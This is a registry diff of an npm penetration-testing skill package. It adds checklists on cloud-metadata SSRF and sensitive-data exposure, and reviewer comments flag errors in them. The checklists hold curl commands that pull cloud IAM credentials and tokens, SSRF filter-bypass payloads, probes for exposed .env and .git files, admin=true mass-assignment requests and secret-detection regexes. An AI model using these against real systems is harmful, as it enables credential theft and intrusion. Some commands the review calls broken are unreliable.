@soulofzephir/pi-skill-pentesting 1.0.2 → 1.0.5
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +1 -1
- package/skills/pentesting/SKILL.md +122 -112
- package/skills/pentesting/checklists/api-security.md +210 -0
- package/skills/pentesting/checklists/cloud-metadata.md +290 -0
- package/skills/pentesting/checklists/sensitive-data.md +323 -0
- package/skills/pentesting/checklists/subdomain.md +243 -0
- package/skills/pentesting/checklists/websocket.md +197 -0
- package/skills/pentesting/tools/exposed-files-scan.ps1 +141 -238
- package/skills/pentesting/tools/full-scan.ps1 +278 -316
- package/soulofzephir-pi-skill-pentesting-1.0.2.tgz +0 -0
- package/soulofzephir-pi-skill-pentesting-1.0.3.tgz +0 -0
- package/soulofzephir-pi-skill-pentesting-1.0.4.tgz +0 -0
@@ -0,0 +1,290 @@
|
|
|
1
|
+
# Cloud Metadata Service Security
|
|
2
|
+
|
|
3
|
+
## ๐ What is Cloud Metadata?
|
|
4
|
+
|
|
5
|
+
Cloud providers expose instance metadata at a well-known IP address. This can contain sensitive information including credentials!
|
|
6
|
+
|
|
7
|
+
---
|
|
8
|
+
|
|
9
|
+
## โ ๏ธ CRITICAL: Metadata Endpoints
|
|
10
|
+
|
|
11
|
+
### AWS EC2
|
|
12
|
+
```
|
|
13
|
+
http://169.254.169.254/ (latest)
|
|
14
|
+
http://169.254.169.254/2009-04-04/ (specific version)
|
|
15
|
+
http://169.254.169.254/latest/meta-data/
|
|
16
|
+
http://169.254.169.254/latest/user-data/
|
|
17
|
+
```
|
|
18
|
+
|
|
19
|
+
### Google Cloud Platform (GCP)
|
|
20
|
+
```
|
|
21
|
+
http://metadata.google.internal/computeMetadata/v1/
|
|
22
|
+
http://metadata.google.internal/computeMetadata/v1/instance/
|
|
23
|
+
http://metadata.google.internal/computeMetadata/v1/project/
|
|
24
|
+
```
|
|
25
|
+
|
|
26
|
+
### Microsoft Azure
|
|
27
|
+
```
|
|
28
|
+
http://169.254.169.254/metadata/instance
|
|
29
|
+
http://169.254.169.254/metadata/instance?api-version=2021-02-01
|
|
30
|
+
```
|
|
31
|
+
|
|
32
|
+
### DigitalOcean
|
|
33
|
+
```
|
|
34
|
+
http://169.254.169.254/metadata/v1/
|
|
35
|
+
http://169.254.169.254/metadata/v1.json
|
|
36
|
+
```
|
|
37
|
+
|
|
38
|
+
---
|
|
39
|
+
|
|
40
|
+
## โ ๏ธ SSRF to Cloud Metadata - CRITICAL
|
|
41
|
+
|
|
42
|
+
**Attack Vector:**
|
|
43
|
+
```
|
|
44
|
+
Attacker finds SSRF vulnerability
|
|
45
|
+
โ
|
|
46
|
+
Forces application to request metadata endpoint
|
|
47
|
+
โ
|
|
48
|
+
Steals cloud credentials
|
|
49
|
+
โ
|
|
50
|
+
Full cloud account compromise!
|
|
51
|
+
```
|
|
52
|
+
|
|
53
|
+
---
|
|
54
|
+
|
|
55
|
+
## ๐งช Testing Checklist
|
|
56
|
+
|
|
57
|
+
### Phase 1: SSRF Detection
|
|
58
|
+
- [ ] URL parameters tested (url, src, dest, redirect, uri, path)
|
|
59
|
+
- [ ] POST body parameters tested
|
|
60
|
+
- [ ] HTTP headers tested (Referer, X-Forwarded-For)
|
|
61
|
+
- [ ] File upload (path traversal in filename)
|
|
62
|
+
- [ ] SVG upload (XXE)
|
|
63
|
+
- [ ] XML parsers (XXE)
|
|
64
|
+
|
|
65
|
+
### Phase 2: Metadata Endpoint Access
|
|
66
|
+
- [ ] AWS metadata accessible?
|
|
67
|
+
- [ ] GCP metadata accessible?
|
|
68
|
+
- [ ] Azure metadata accessible?
|
|
69
|
+
- [ ] DigitalOcean metadata accessible?
|
|
70
|
+
- [ ] Alibaba Cloud metadata accessible?
|
|
71
|
+
|
|
72
|
+
### Phase 3: Metadata Data Exposed
|
|
73
|
+
- [ ] Instance ID exposed
|
|
74
|
+
- [ ] IAM credentials exposed (AWS role)
|
|
75
|
+
- [ ] IAM token exposed
|
|
76
|
+
- [ ] User data exposed (often contains scripts/config)
|
|
77
|
+
- [ ] SSH keys exposed (GCP)
|
|
78
|
+
- [ ] Service account tokens exposed (GCP)
|
|
79
|
+
|
|
80
|
+
### Phase 4: Credential Exploitation
|
|
81
|
+
- [ ] IAM role can be assumed
|
|
82
|
+
- [ ] AWS CLI configured with stolen credentials
|
|
83
|
+
- [ ] S3 buckets accessible
|
|
84
|
+
- [ ] Other AWS services accessible
|
|
85
|
+
|
|
86
|
+
---
|
|
87
|
+
|
|
88
|
+
## ๐ง Testing Commands
|
|
89
|
+
|
|
90
|
+
### AWS Metadata Check
|
|
91
|
+
```bash
|
|
92
|
+
# Basic metadata access
|
|
93
|
+
curl http://169.254.169.254/latest/meta-data/
|
|
94
|
+
curl http://169.254.169.254/latest/user-data/
|
|
95
|
+
|
|
96
|
+
# IAM credentials (if vulnerable)
|
|
97
|
+
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
|
|
98
|
+
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
|
|
99
|
+
|
|
100
|
+
# Get token (newer versions)
|
|
101
|
+
curl -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token: true"
|
|
102
|
+
```
|
|
103
|
+
|
|
104
|
+
### GCP Metadata Check
|
|
105
|
+
```bash
|
|
106
|
+
# Must include header
|
|
107
|
+
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/
|
|
108
|
+
|
|
109
|
+
# Instance info
|
|
110
|
+
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/id
|
|
111
|
+
|
|
112
|
+
# Service account
|
|
113
|
+
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/
|
|
114
|
+
|
|
115
|
+
# Access token (if vulnerable!)
|
|
116
|
+
curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
|
|
117
|
+
```
|
|
118
|
+
|
|
119
|
+
### Azure Metadata Check
|
|
120
|
+
```bash
|
|
121
|
+
# Requires API version
|
|
122
|
+
curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
|
|
123
|
+
|
|
124
|
+
# Managed identity token
|
|
125
|
+
curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?resource=https://management.azure.com"
|
|
126
|
+
```
|
|
127
|
+
|
|
128
|
+
### DigitalOcean Metadata
|
|
129
|
+
```bash
|
|
130
|
+
curl http://169.254.169.254/metadata/v1.json
|
|
131
|
+
curl http://169.254.169.254/metadata/v1/user-data
|
|
132
|
+
```
|
|
133
|
+
|
|
134
|
+
---
|
|
135
|
+
|
|
136
|
+
## ๐ง SSRF Payloads for Metadata
|
|
137
|
+
|
|
138
|
+
### Basic
|
|
139
|
+
```
|
|
140
|
+
http://169.254.169.254/
|
|
141
|
+
http://169.254.169.254/latest/meta-data/
|
|
142
|
+
http://169.254.169.254/latest/user-data/
|
|
143
|
+
```
|
|
144
|
+
|
|
145
|
+
### With Headers
|
|
146
|
+
```bash
|
|
147
|
+
# AWS - get token first
|
|
148
|
+
curl -X PUT -H "X-aws-ec2-metadata-token: anything" http://target.com/url?param=http://169.254.169.254/latest/meta-data/
|
|
149
|
+
|
|
150
|
+
# GCP - require header
|
|
151
|
+
curl -H "Metadata-Flavor: Google" http://target.com/url?param=http://metadata.google.internal/
|
|
152
|
+
```
|
|
153
|
+
|
|
154
|
+
### Bypass Filters
|
|
155
|
+
```bash
|
|
156
|
+
# IP encoding
|
|
157
|
+
http://127.0.0.1
|
|
158
|
+
http://2130706433 (decimal)
|
|
159
|
+
http://0x7f000001 (hex)
|
|
160
|
+
http://[::1]
|
|
161
|
+
|
|
162
|
+
# URL encoding
|
|
163
|
+
http://169.254.169.254 โ http://%31%36%39.%32%35%34.%31%36%39.%32%35%34
|
|
164
|
+
|
|
165
|
+
# DNS rebinding
|
|
166
|
+
http://attacker.com -> points to 169.254.169.254
|
|
167
|
+
|
|
168
|
+
# Open redirect
|
|
169
|
+
http://target.com/redirect?url=http://169.254.169.254/
|
|
170
|
+
```
|
|
171
|
+
|
|
172
|
+
---
|
|
173
|
+
|
|
174
|
+
## ๐ SSRF Test Parameters
|
|
175
|
+
|
|
176
|
+
Common parameter names to test:
|
|
177
|
+
```
|
|
178
|
+
url
|
|
179
|
+
src
|
|
180
|
+
source
|
|
181
|
+
uri
|
|
182
|
+
link
|
|
183
|
+
redirect
|
|
184
|
+
path
|
|
185
|
+
continue
|
|
186
|
+
url
|
|
187
|
+
window
|
|
188
|
+
next
|
|
189
|
+
data
|
|
190
|
+
reference
|
|
191
|
+
spider
|
|
192
|
+
baseUrl
|
|
193
|
+
xml
|
|
194
|
+
view
|
|
195
|
+
doc
|
|
196
|
+
site
|
|
197
|
+
html
|
|
198
|
+
feed
|
|
199
|
+
host
|
|
200
|
+
port
|
|
201
|
+
to
|
|
202
|
+
out
|
|
203
|
+
view
|
|
204
|
+
dir
|
|
205
|
+
show
|
|
206
|
+
navigation
|
|
207
|
+
open
|
|
208
|
+
file
|
|
209
|
+
val
|
|
210
|
+
validate
|
|
211
|
+
domain
|
|
212
|
+
callback
|
|
213
|
+
return
|
|
214
|
+
page
|
|
215
|
+
feed
|
|
216
|
+
host
|
|
217
|
+
pass
|
|
218
|
+
data
|
|
219
|
+
address
|
|
220
|
+
link
|
|
221
|
+
url
|
|
222
|
+
```
|
|
223
|
+
|
|
224
|
+
---
|
|
225
|
+
|
|
226
|
+
## ๐ก๏ธ Cloud Metadata Protection Checklist
|
|
227
|
+
|
|
228
|
+
### For Cloud Providers (Disable IMDS)
|
|
229
|
+
```bash
|
|
230
|
+
# AWS - require IMDSv2
|
|
231
|
+
aws ec2 modify-instance-metadata-options \
|
|
232
|
+
--instance-id i-1234567890abcdef0 \
|
|
233
|
+
--http-tokens required \
|
|
234
|
+
--http-put-response-hop-limit 1
|
|
235
|
+
|
|
236
|
+
# GCP - disable via metadata server
|
|
237
|
+
# No direct disable, but use:
|
|
238
|
+
# - Service account with minimal permissions
|
|
239
|
+
# - No legacy endpoints
|
|
240
|
+
# - VPC firewall rules
|
|
241
|
+
|
|
242
|
+
# Azure
|
|
243
|
+
# Use IMDS with managed identity
|
|
244
|
+
# Restrict via firewall
|
|
245
|
+
```
|
|
246
|
+
|
|
247
|
+
### For Application Developers
|
|
248
|
+
- [ ] Validate all user input
|
|
249
|
+
- [ ] Use allowlist for URLs
|
|
250
|
+
- [ ] Block private IP ranges
|
|
251
|
+
- [ ] Disable unnecessary URL schemas
|
|
252
|
+
- [ ] Use security library (no direct URL fetching)
|
|
253
|
+
- [ ] Implement SSRF protection
|
|
254
|
+
- [ ] Log SSRF attempts
|
|
255
|
+
|
|
256
|
+
### For Cloud Security
|
|
257
|
+
- [ ] Use IMDSv2 (AWS)
|
|
258
|
+
- [ ] Use service accounts with minimal privileges
|
|
259
|
+
- [ ] No long-lived credentials in instance metadata
|
|
260
|
+
- [ ] Regular audit of IAM roles
|
|
261
|
+
- [ ] Enable VPC endpoints
|
|
262
|
+
- [ ] Network segmentation
|
|
263
|
+
|
|
264
|
+
---
|
|
265
|
+
|
|
266
|
+
## ๐ Risk Assessment
|
|
267
|
+
|
|
268
|
+
| Finding | Severity | CVSS |
|
|
269
|
+
|---------|----------|------|
|
|
270
|
+
| AWS metadata accessible | ๐ด CRITICAL | 10.0 |
|
|
271
|
+
| GCP service account token stolen | ๐ด CRITICAL | 10.0 |
|
|
272
|
+
| Azure managed identity exploited | ๐ด CRITICAL | 9.8 |
|
|
273
|
+
| Arbitrary file read (metadata) | ๐ด CRITICAL | 9.8 |
|
|
274
|
+
| SSRF without credentials | ๐ HIGH | 8.6 |
|
|
275
|
+
|
|
276
|
+
---
|
|
277
|
+
|
|
278
|
+
## ๐จ Real-World Impact
|
|
279
|
+
|
|
280
|
+
```
|
|
281
|
+
1. Attacker finds SSRF in web app
|
|
282
|
+
2. Attacker requests AWS metadata
|
|
283
|
+
3. Attacker steals IAM credentials
|
|
284
|
+
4. Attacker assumes admin role
|
|
285
|
+
5. Attacker has full AWS access
|
|
286
|
+
6. Attacker exfiltrates all data
|
|
287
|
+
7. Attacker creates backdoor
|
|
288
|
+
```
|
|
289
|
+
|
|
290
|
+
**Prevention:** Always assume SSRF exists, protect metadata endpoints!
|
|
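Review bot: the IMDSv2 token request in the "AWS Metadata Check" block uses the wrong header, and the "With Headers" SSRF payloads cannot work as written. `curl -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token: true"` should send `X-aws-ec2-metadata-token-ttl-seconds: 21600` on the PUT; `X-aws-ec2-metadata-token: <token>` is the header carried on the subsequent GETs. In the "With Headers" section, `curl -X PUT -H "X-aws-ec2-metadata-token: anything" http://target.com/url?param=...` and the matching `Metadata-Flavor: Google` line send the header to target.com, not to the metadata service; the vulnerable application issues the inner request with its own headers, which is exactly why IMDSv2 and the GCP/Azure header requirements defeat plain GET-based SSRF. The section should state that instead, and note that a PUT-capable SSRF (or a DigitalOcean target, which has no header requirement) is what is needed. Two smaller points in the same hunk: the "Bypass Filters" decimal and hex forms (`http://2130706433`, `http://0x7f000001`) encode 127.0.0.1, not the 169.254.169.254 address the checklist is about (decimal 2852039166, hex 0xA9FEA9FE), and the heading "For Cloud Providers (Disable IMDS)" is mislabelled: `--http-tokens required --http-put-response-hop-limit 1` enforces IMDSv2 rather than disabling the endpoint (that would be `--http-endpoint disabled`). The "SSRF Test Parameters" list also repeats `url`, `view`, `feed`, `host`, `data` and `link`, and the 10.0 CVSS for "AWS metadata accessible" should be qualified: a reachable endpoint with no attached role and IMDSv2 enforced is an information-disclosure finding, not an account compromise.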
@@ -0,0 +1,323 @@
|
|
|
1
|
+
# Sensitive Data Exposure Detection
|
|
2
|
+
|
|
3
|
+
## ๐ What is Sensitive Data?
|
|
4
|
+
|
|
5
|
+
Data that must be protected from unauthorized access:
|
|
6
|
+
- Personal Identifiable Information (PII)
|
|
7
|
+
- Financial data
|
|
8
|
+
- Authentication credentials
|
|
9
|
+
- Healthcare information
|
|
10
|
+
- Business secrets
|
|
11
|
+
|
|
12
|
+
---
|
|
13
|
+
|
|
14
|
+
## โ ๏ธ Common Sources of Data Exposure
|
|
15
|
+
|
|
16
|
+
### 1. Source Code Exposure
|
|
17
|
+
```
|
|
18
|
+
.git/ directory
|
|
19
|
+
_backup.zip
|
|
20
|
+
*.bak
|
|
21
|
+
*.swp
|
|
22
|
+
*.tmp
|
|
23
|
+
```
|
|
24
|
+
|
|
25
|
+
### 2. Configuration Files
|
|
26
|
+
```
|
|
27
|
+
.env
|
|
28
|
+
config.php
|
|
29
|
+
wp-config.php
|
|
30
|
+
settings.py
|
|
31
|
+
application.properties
|
|
32
|
+
```
|
|
33
|
+
|
|
34
|
+
### 3. API Responses
|
|
35
|
+
```
|
|
36
|
+
Excessive data exposure
|
|
37
|
+
Missing field filtering
|
|
38
|
+
Debug responses
|
|
39
|
+
```
|
|
40
|
+
|
|
41
|
+
### 4. Client-Side Data
|
|
42
|
+
```
|
|
43
|
+
JavaScript source maps
|
|
44
|
+
localStorage/sessionStorage
|
|
45
|
+
Cookies
|
|
46
|
+
URL parameters
|
|
47
|
+
```
|
|
48
|
+
|
|
49
|
+
---
|
|
50
|
+
|
|
51
|
+
## ๐งช Testing Checklist
|
|
52
|
+
|
|
53
|
+
### Phase 1: Sensitive Files
|
|
54
|
+
- [ ] `.env` files exposed
|
|
55
|
+
- [ ] `.git/` directory accessible
|
|
56
|
+
- [ ] Backup files exposed
|
|
57
|
+
- [ ] Configuration files accessible
|
|
58
|
+
- [ ] Database dumps exposed
|
|
59
|
+
|
|
60
|
+
### Phase 2: Source Code
|
|
61
|
+
- [ ] Source maps (.map) exposed
|
|
62
|
+
- [ ] JavaScript source code analyzed
|
|
63
|
+
- [ ] Debug endpoints accessible
|
|
64
|
+
- [ ] Swagger/OpenAPI docs exposed
|
|
65
|
+
- [ ] Internal paths in JS
|
|
66
|
+
|
|
67
|
+
### Phase 3: API Responses
|
|
68
|
+
- [ ] Full data returned vs needed
|
|
69
|
+
- [ ] Hidden fields in JSON
|
|
70
|
+
- [ ] Passwords in responses
|
|
71
|
+
- [ ] Internal IDs exposed
|
|
72
|
+
- [ ] Stack traces in errors
|
|
73
|
+
|
|
74
|
+
### Phase 4: Client Storage
|
|
75
|
+
- [ ] Sensitive data in localStorage
|
|
76
|
+
- [ ] Sensitive data in sessionStorage
|
|
77
|
+
- [ ] Sensitive data in cookies
|
|
78
|
+
- [ ] Sensitive data in URL
|
|
79
|
+
- [ ] Browser history
|
|
80
|
+
|
|
81
|
+
### Phase 5: Credentials Detection
|
|
82
|
+
- [ ] API keys in source code
|
|
83
|
+
- [ ] AWS credentials in source
|
|
84
|
+
- [ ] Private keys exposed
|
|
85
|
+
- [ ] Database passwords
|
|
86
|
+
- [ ] JWT tokens
|
|
87
|
+
|
|
88
|
+
### Phase 6: PII Exposure
|
|
89
|
+
- [ ] Email addresses
|
|
90
|
+
- [ ] Phone numbers
|
|
91
|
+
- [ ] Physical addresses
|
|
92
|
+
- [ ] Social security numbers
|
|
93
|
+
- [ ] Dates of birth
|
|
94
|
+
|
|
95
|
+
---
|
|
96
|
+
|
|
97
|
+
## ๐ง Detection Tools
|
|
98
|
+
|
|
99
|
+
### grep for Secrets
|
|
100
|
+
```bash
|
|
101
|
+
# Search for API keys
|
|
102
|
+
grep -r "api_key\|apikey\|api-key" . --include="*.js" --include="*.json"
|
|
103
|
+
grep -r "aws_access_key\|aws_secret" . --include="*.py" --include="*.js"
|
|
104
|
+
grep -r "password\|pwd\|pass" . --include="*.js" --include="*.json"
|
|
105
|
+
|
|
106
|
+
# Search for tokens
|
|
107
|
+
grep -r "token\|bearer\|authorization" . --include="*.js" --include="*.json"
|
|
108
|
+
|
|
109
|
+
# Search for private keys
|
|
110
|
+
grep -r "BEGIN RSA PRIVATE KEY\|BEGIN PRIVATE KEY" .
|
|
111
|
+
```
|
|
112
|
+
|
|
113
|
+
### trufflehog (Secrets Scanner)
|
|
114
|
+
```bash
|
|
115
|
+
# Scan git repo
|
|
116
|
+
trufflehog git https://github.com/target/repo.git
|
|
117
|
+
|
|
118
|
+
# Scan filesystem
|
|
119
|
+
trufflehog filesystem .
|
|
120
|
+
|
|
121
|
+
# Scan S3 bucket
|
|
122
|
+
trufflehog s3 --bucket=bucket-name
|
|
123
|
+
|
|
124
|
+
# Scan GitHub org
|
|
125
|
+
trufflehog github --org=target-org
|
|
126
|
+
```
|
|
127
|
+
|
|
128
|
+
### gitrob (GitHub Recon)
|
|
129
|
+
```bash
|
|
130
|
+
gitrob target --no-gist
|
|
131
|
+
```
|
|
132
|
+
|
|
133
|
+
### gitleaks (Secret Scanner)
|
|
134
|
+
```bash
|
|
135
|
+
# Scan repo
|
|
136
|
+
gitleaks detect --source .
|
|
137
|
+
|
|
138
|
+
# Scan with config
|
|
139
|
+
gitleaks detect --source . --config gitleaks.toml
|
|
140
|
+
```
|
|
141
|
+
|
|
142
|
+
### shhgit (Real-time GitHub Scanning)
|
|
143
|
+
```bash
|
|
144
|
+
shhgit -domain github.com -search-keyword "target"
|
|
145
|
+
```
|
|
146
|
+
|
|
147
|
+
---
|
|
148
|
+
|
|
149
|
+
## ๐ง Pattern Detection
|
|
150
|
+
|
|
151
|
+
### API Keys & Tokens
|
|
152
|
+
```
|
|
153
|
+
AKIA[0-9A-Z]{16} โ AWS Access Key
|
|
154
|
+
[0-9a-zA-Z+/]{40} โ AWS Secret Key (base64)
|
|
155
|
+
AIza[0-9A-Za-z_-]{35} โ Google API Key
|
|
156
|
+
sk_live_[0-9a-z]{24,32} โ Stripe
|
|
157
|
+
sk_test_[0-9a-z]{24,32} โ Stripe Test
|
|
158
|
+
ghp_[0-9a-zA-Z]{36} โ GitHub Personal Access Token
|
|
159
|
+
xox[baprs]-[0-9a-zA-Z]{10,} โ Slack Token
|
|
160
|
+
```
|
|
161
|
+
|
|
162
|
+
### Password Patterns
|
|
163
|
+
```
|
|
164
|
+
password=.*
|
|
165
|
+
pwd=.*
|
|
166
|
+
pass=.*
|
|
167
|
+
secret=.*
|
|
168
|
+
credential=.*
|
|
169
|
+
```
|
|
170
|
+
|
|
171
|
+
### Private Keys
|
|
172
|
+
```
|
|
173
|
+
-----BEGIN RSA PRIVATE KEY-----
|
|
174
|
+
-----BEGIN EC PRIVATE KEY-----
|
|
175
|
+
-----BEGIN PRIVATE KEY-----
|
|
176
|
+
-----BEGIN OPENSSH PRIVATE KEY-----
|
|
177
|
+
```
|
|
178
|
+
|
|
179
|
+
### JWT Tokens
|
|
180
|
+
```
|
|
181
|
+
eyJ[0-9A-Za-z_-]*\.eyJ[0-9A-Za-z_-]*\.[0-9A-Za-z_-]*
|
|
182
|
+
```
|
|
183
|
+
|
|
184
|
+
---
|
|
185
|
+
|
|
186
|
+
## ๐ง File Patterns to Check
|
|
187
|
+
|
|
188
|
+
```bash
|
|
189
|
+
# Configuration
|
|
190
|
+
find . -name ".env*" -o -name "*.config*" -o -name "config.*"
|
|
191
|
+
find . -name "*.php" -o -name "*.py" -o -name "*.js"
|
|
192
|
+
|
|
193
|
+
# Backups
|
|
194
|
+
find . -name "*.bak" -o -name "*.backup" -o -name "*.old"
|
|
195
|
+
find . -name "*.zip" -o -name "*.tar" -o -name "*.tar.gz"
|
|
196
|
+
|
|
197
|
+
# Source control
|
|
198
|
+
find . -name ".git" -type d
|
|
199
|
+
find . -name ".svn" -type d
|
|
200
|
+
|
|
201
|
+
# Keys
|
|
202
|
+
find . -name "*.pem" -o -name "*.key" -o -name "*.p12"
|
|
203
|
+
```
|
|
204
|
+
|
|
205
|
+
---
|
|
206
|
+
|
|
207
|
+
## ๐ Data Classification
|
|
208
|
+
|
|
209
|
+
| Type | Sensitivity | Examples |
|
|
210
|
+
|------|------------|----------|
|
|
211
|
+
| ๐ด Critical | Highest | Passwords, Private Keys, SSN |
|
|
212
|
+
| ๐ High | High | API Keys, Tokens, Credit Cards |
|
|
213
|
+
| ๐ก Medium | Medium | Email, Phone, Addresses |
|
|
214
|
+
| ๐ข Low | Low | Public data |
|
|
215
|
+
|
|
216
|
+
---
|
|
217
|
+
|
|
218
|
+
## ๐ ๏ธ API Response Analysis
|
|
219
|
+
|
|
220
|
+
### Test for Excessive Data
|
|
221
|
+
```bash
|
|
222
|
+
# Get user profile - should only return needed fields
|
|
223
|
+
curl -X GET /api/user/123
|
|
224
|
+
|
|
225
|
+
# Check if returns:
|
|
226
|
+
# - Password hash
|
|
227
|
+
# - Internal IDs
|
|
228
|
+
# - Debug info
|
|
229
|
+
# - Other users' data
|
|
230
|
+
```
|
|
231
|
+
|
|
232
|
+
### Test for Hidden Fields
|
|
233
|
+
```html
|
|
234
|
+
<!-- Check HTML forms for hidden inputs -->
|
|
235
|
+
<input type="hidden" name="admin" value="true">
|
|
236
|
+
<input type="hidden" name="role" value="user">
|
|
237
|
+
|
|
238
|
+
# Change hidden field values
|
|
239
|
+
curl -X POST /api/update -d "role=admin" -d "user_id=123"
|
|
240
|
+
```
|
|
241
|
+
|
|
242
|
+
### Test for Mass Assignment
|
|
243
|
+
```bash
|
|
244
|
+
# Try adding extra fields
|
|
245
|
+
curl -X POST /api/user -d "name=test&email=test@test.com&admin=true"
|
|
246
|
+
curl -X PUT /api/user/123 -d "balance=1000&admin=true"
|
|
247
|
+
```
|
|
248
|
+
|
|
249
|
+
---
|
|
250
|
+
|
|
251
|
+
## ๐ Exposure Risk Matrix
|
|
252
|
+
|
|
253
|
+
| Exposure Type | Risk | CVSS |
|
|
254
|
+
|---------------|------|------|
|
|
255
|
+
| Database credentials | ๐ด CRITICAL | 9.8 |
|
|
256
|
+
| AWS keys exposed | ๐ด CRITICAL | 9.8 |
|
|
257
|
+
| Private keys | ๐ด CRITICAL | 9.8 |
|
|
258
|
+
| API keys exposed | ๐ HIGH | 7.5 |
|
|
259
|
+
| PII in logs | ๐ HIGH | 7.1 |
|
|
260
|
+
| Token in URL | ๐ก MEDIUM | 6.5 |
|
|
261
|
+
| Debug info | ๐ก MEDIUM | 5.3 |
|
|
262
|
+
|
|
263
|
+
---
|
|
264
|
+
|
|
265
|
+
## ๐ก๏ธ Prevention Checklist
|
|
266
|
+
|
|
267
|
+
### Source Code
|
|
268
|
+
- [ ] .git/ blocked by web server
|
|
269
|
+
- [ ] No backup files in web root
|
|
270
|
+
- [ ] Source maps disabled in production
|
|
271
|
+
- [ ] No secrets in code
|
|
272
|
+
|
|
273
|
+
### API Responses
|
|
274
|
+
- [ ] Only return needed fields
|
|
275
|
+
- [ ] No passwords/tokens in responses
|
|
276
|
+
- [ ] No internal IDs
|
|
277
|
+
- [ ] Error handling doesn't leak info
|
|
278
|
+
|
|
279
|
+
### Client Storage
|
|
280
|
+
- [ ] No sensitive data in localStorage
|
|
281
|
+
- [ ] Cookies HttpOnly + Secure
|
|
282
|
+
- [ ] No sensitive data in URL
|
|
283
|
+
|
|
284
|
+
### Secrets Management
|
|
285
|
+
- [ ] Use environment variables
|
|
286
|
+
- [ ] Use secret management services
|
|
287
|
+
- [ ] Rotate secrets regularly
|
|
288
|
+
- [ ] No default passwords
|
|
289
|
+
|
|
290
|
+
---
|
|
291
|
+
|
|
292
|
+
## ๐ Quick Scan Commands
|
|
293
|
+
|
|
294
|
+
```bash
|
|
295
|
+
# Search for secrets in JS files
|
|
296
|
+
grep -rn "password\|api_key\|secret\|token" --include="*.js" .
|
|
297
|
+
|
|
298
|
+
# Check for exposed .env
|
|
299
|
+
curl -s target.com/.env | head -20
|
|
300
|
+
|
|
301
|
+
# Check for git directory
|
|
302
|
+
curl -s target.com/.git/config
|
|
303
|
+
|
|
304
|
+
# Check for backups
|
|
305
|
+
curl -s target.com/backup.zip -o /dev/null -w "%{http_code}"
|
|
306
|
+
|
|
307
|
+
# Check API response for sensitive data
|
|
308
|
+
curl -s /api/user/1 | jq 'keys'
|
|
309
|
+
```
|
|
310
|
+
|
|
311
|
+
---
|
|
312
|
+
|
|
313
|
+
## ๐ Sensitive Data Checklist Summary
|
|
314
|
+
|
|
315
|
+
| Check | Status | Severity |
|
|
316
|
+
|-------|--------|----------|
|
|
317
|
+
| .env exposed | โ | ๐ด CRITICAL |
|
|
318
|
+
| .git accessible | โ | ๐ด CRITICAL |
|
|
319
|
+
| API keys in JS | โ | ๐ HIGH |
|
|
320
|
+
| Passwords in response | โ | ๐ด CRITICAL |
|
|
321
|
+
| PII exposed | โ | ๐ HIGH |
|
|
322
|
+
| Token in URL | โ | ๐ก MEDIUM |
|
|
323
|
+
| Debug mode | โ | ๐ HIGH |
|
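Review bot: the "Pattern Detection" regexes in this hunk will miss real keys and drown in false positives. `sk_live_[0-9a-z]{24,32}` and `sk_test_[0-9a-z]{24,32}` exclude uppercase letters, which Stripe keys contain, so the character class should be `[0-9a-zA-Z]`; and `[0-9a-zA-Z+/]{40}` on its own matches any 40-character alphanumeric string (hashes, base64 blobs, minified identifiers) and should only be applied next to an `aws_secret_access_key` or `AKIA...` context rather than listed as a standalone "AWS Secret Key" pattern. The same applies to `grep -r "password\|pwd\|pass"`, which matches `passport`, `bypass` and `compass`; anchoring on `password\s*[:=]` gives far less noise. Two presentation problems: the "Test for Hidden Fields" block is fenced as `html` but ends with a `#` comment and a `curl -X POST /api/update ...` command, so it should be split into an HTML snippet and a bash block, and the curl calls `curl -X GET /api/user/123` and `curl -s /api/user/1 | jq 'keys'` use a bare path with no host, which curl cannot resolve; they need a full URL such as `https://target/api/user/123`. Finally, the "Test for Hidden Fields" and "Test for Mass Assignment" subsections describe privilege-escalation checks (changing `role=admin`, `admin=true`), not data exposure, so they belong in the API security checklist added in the same release rather than under "API Response Analysis".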